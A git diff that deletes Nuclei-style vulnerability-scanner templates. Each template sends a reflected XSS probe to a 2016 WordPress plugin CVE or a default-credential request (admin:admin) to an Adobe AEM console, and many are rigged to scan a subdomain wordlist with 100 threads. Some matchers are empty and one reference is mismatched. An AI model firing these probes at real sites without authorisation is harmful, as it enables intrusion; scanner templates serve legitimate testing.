diff --git a/tmp/cve/cve-2016-0957-2635.yaml b/tmp/cve/cve-2016-0957-2635.yaml
deleted file mode 100644
index bd2ca10366..0000000000
--- a/tmp/cve/cve-2016-0957-2635.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-0957
-info:
- name: Adobe AEM Console Disclosure
- author: geeknik
- description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
- reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- severity: high
- tags: cve,cve2016,adobe,aem
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /system/console?.css HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- Authorization: Basic YWRtaW46YWRtaW4K
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Adobe"
- - "java.lang"
- - "(Runtime)"
- condition: and
diff --git a/tmp/cve/cve-2016-0957-2638.yaml b/tmp/cve/cve-2016-0957-2638.yaml
deleted file mode 100644
index 185132690b..0000000000
--- a/tmp/cve/cve-2016-0957-2638.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2016-0957
-info:
- name: Adobe AEM Console Disclosure
- author: geeknik
- description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
- reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- severity: high
- tags: cve,cve2016,adobe,aem
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/system/console?.css"
- header:
- - Authorization: "Basic YWRtaW46YWRtaW4K"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Adobe"
- - "java.lang"
- - "(Runtime)"
- condition: and
diff --git a/tmp/cve/cve-2016-1000126-2640.yaml b/tmp/cve/cve-2016-1000126-2640.yaml
deleted file mode 100644
index ea7c984f74..0000000000
--- a/tmp/cve/cve-2016-1000126-2640.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-1000126
-info:
- name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000127-2645.yaml b/tmp/cve/cve-2016-1000127-2645.yaml
deleted file mode 100644
index 88544f4750..0000000000
--- a/tmp/cve/cve-2016-1000127-2645.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000127
-info:
- name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin ajax-random-post v2.00
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000128-2649.yaml b/tmp/cve/cve-2016-1000128-2649.yaml
deleted file mode 100644
index 86933b85ee..0000000000
--- a/tmp/cve/cve-2016-1000128-2649.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-1000128
-info:
- name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000129-2653.yaml b/tmp/cve/cve-2016-1000129-2653.yaml
deleted file mode 100644
index ef0adfec4d..0000000000
--- a/tmp/cve/cve-2016-1000129-2653.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000129
-info:
- name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000130-2658.yaml b/tmp/cve/cve-2016-1000130-2658.yaml
deleted file mode 100644
index 8082a7fc0a..0000000000
--- a/tmp/cve/cve-2016-1000130-2658.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000130
-info:
- name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin e-search v1.0
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000131-2662.yaml b/tmp/cve/cve-2016-1000131-2662.yaml
deleted file mode 100644
index 6b30db1769..0000000000
--- a/tmp/cve/cve-2016-1000131-2662.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-1000131
-info:
- name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000132-2667.yaml b/tmp/cve/cve-2016-1000132-2667.yaml
deleted file mode 100644
index 560b90839a..0000000000
--- a/tmp/cve/cve-2016-1000132-2667.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000132
-info:
- name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000133-2672.yaml b/tmp/cve/cve-2016-1000133-2672.yaml
deleted file mode 100644
index bd1c6f7c8b..0000000000
--- a/tmp/cve/cve-2016-1000133-2672.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000133
-info:
- name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000134-2677.yaml b/tmp/cve/cve-2016-1000134-2677.yaml
deleted file mode 100644
index 19df5f291c..0000000000
--- a/tmp/cve/cve-2016-1000134-2677.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000134
-info:
- name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin hdw-tube v1.2
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000135-2682.yaml b/tmp/cve/cve-2016-1000135-2682.yaml
deleted file mode 100644
index 199872084e..0000000000
--- a/tmp/cve/cve-2016-1000135-2682.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000135
-info:
- name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin hdw-tube v1.2
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000136-2687.yaml b/tmp/cve/cve-2016-1000136-2687.yaml
deleted file mode 100644
index b07e3b5582..0000000000
--- a/tmp/cve/cve-2016-1000136-2687.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-1000136
-info:
- name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin heat-trackr v1.0
- reference:
- - http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
- tags: cve,cve2016,wordpress,xss,wp-plugin
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2016-1000136
- cwe-id: CWE-79
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000137-2691.yaml b/tmp/cve/cve-2016-1000137-2691.yaml
deleted file mode 100644
index 321bc89279..0000000000
--- a/tmp/cve/cve-2016-1000137-2691.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-1000137
-info:
- name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000138-2695.yaml b/tmp/cve/cve-2016-1000138-2695.yaml
deleted file mode 100644
index 9e64d42589..0000000000
--- a/tmp/cve/cve-2016-1000138-2695.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-1000138
-info:
- name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000139-2700.yaml b/tmp/cve/cve-2016-1000139-2700.yaml
deleted file mode 100644
index fd980933af..0000000000
--- a/tmp/cve/cve-2016-1000139-2700.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2016-1000139
-info:
- name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
- author: daffainfo
- severity: medium
- reference:
- - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
- tags: cve,cve2016,wordpress,wp-plugin,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"><"'
- - 'input type="text" name="ContactId"'
- condition: and
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000140-2704.yaml b/tmp/cve/cve-2016-1000140-2704.yaml
deleted file mode 100644
index 278b50262f..0000000000
--- a/tmp/cve/cve-2016-1000140-2704.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-1000140
-info:
- name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000141-2709.yaml b/tmp/cve/cve-2016-1000141-2709.yaml
deleted file mode 100644
index 38f83ffcdd..0000000000
--- a/tmp/cve/cve-2016-1000141-2709.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: CVE-2016-1000141
-info:
- name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
- tags: cve,cve2016,wordpress,xss,wp-plugin
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2016-1000141
- cwe-id: CWE-79
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000142-2713.yaml b/tmp/cve/cve-2016-1000142-2713.yaml
deleted file mode 100644
index ebfab1af27..0000000000
--- a/tmp/cve/cve-2016-1000142-2713.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-1000142
-info:
- name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
- reference:
- - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
- tags: cve,cve2016,wordpress,wp-plugin,xss
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2016-1000142
- cwe-id: CWE-79
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000143-2716.yaml b/tmp/cve/cve-2016-1000143-2716.yaml
deleted file mode 100644
index af84a2e287..0000000000
--- a/tmp/cve/cve-2016-1000143-2716.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-1000143
-info:
- name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
- reference:
- - http://www.vapidlabs.com/wp/wp_advisory.php?v=780
- - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
- tags: cve,cve2016,wordpress,wp-plugin,xss
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2016-1000143
- cwe-id: CWE-79
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000146-2719.yaml b/tmp/cve/cve-2016-1000146-2719.yaml
deleted file mode 100644
index 93420872fc..0000000000
--- a/tmp/cve/cve-2016-1000146-2719.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-1000146
-info:
- name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000148-2723.yaml b/tmp/cve/cve-2016-1000148-2723.yaml
deleted file mode 100644
index c1b6175e48..0000000000
--- a/tmp/cve/cve-2016-1000148-2723.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2016-1000148
-info:
- name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: |
- - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
- tags: cve,cve2016,wordpress,wp-plugin,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '<"'
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000149-2726.yaml b/tmp/cve/cve-2016-1000149-2726.yaml
deleted file mode 100644
index 5cd03b873a..0000000000
--- a/tmp/cve/cve-2016-1000149-2726.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2016-1000149
-info:
- name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000152-2730.yaml b/tmp/cve/cve-2016-1000152-2730.yaml
deleted file mode 100644
index 16b1eea4a3..0000000000
--- a/tmp/cve/cve-2016-1000152-2730.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000152
-info:
- name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin tidio-form v1.0
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000153-2734.yaml b/tmp/cve/cve-2016-1000153-2734.yaml
deleted file mode 100644
index 168c798ae0..0000000000
--- a/tmp/cve/cve-2016-1000153-2734.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2016-1000153
-info:
- name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
- tags: cve,cve2016,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2016-1000154-2738.yaml b/tmp/cve/cve-2016-1000154-2738.yaml
deleted file mode 100644
index bfeb97afc2..0000000000
--- a/tmp/cve/cve-2016-1000154-2738.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2016-1000154
-info:
- name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin whizz v1.0.
